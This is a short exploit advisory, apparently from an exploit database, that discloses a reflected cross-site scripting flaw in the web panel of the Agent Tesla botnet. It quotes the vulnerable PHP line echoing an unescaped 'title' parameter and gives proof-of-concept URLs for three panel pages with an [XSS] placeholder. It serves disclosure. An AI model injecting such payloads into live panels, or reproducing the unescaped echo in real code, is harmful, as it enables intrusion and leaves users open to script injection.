################################ # Exploit Title: Agent Tesla Botnet - Cross Site Scripting Vulnerability # Google Dork: n/a # Date: 29/10/2020 # Exploit Author: n4pst3r # Vendor Homepage: unkn0wn # Software Link: http://www.agenttesla.com/ ¡ Down ! # Version: unkn0wn # Tested on: Windows 10, debian 7 # CVE : n/a ################################ # Vuln-Code: http://127.0.0.1/WebPanel/pages/get-log.php /get-screens.php /get-webcams.php <?php echo $_GET['title']; ?> ################################ PoC: http://127.0.0.1/WebPanel/pages/get-log.php?title=[XSS] /get-screens.php?title=[XSS] /get-webcams.php?title=[XSS]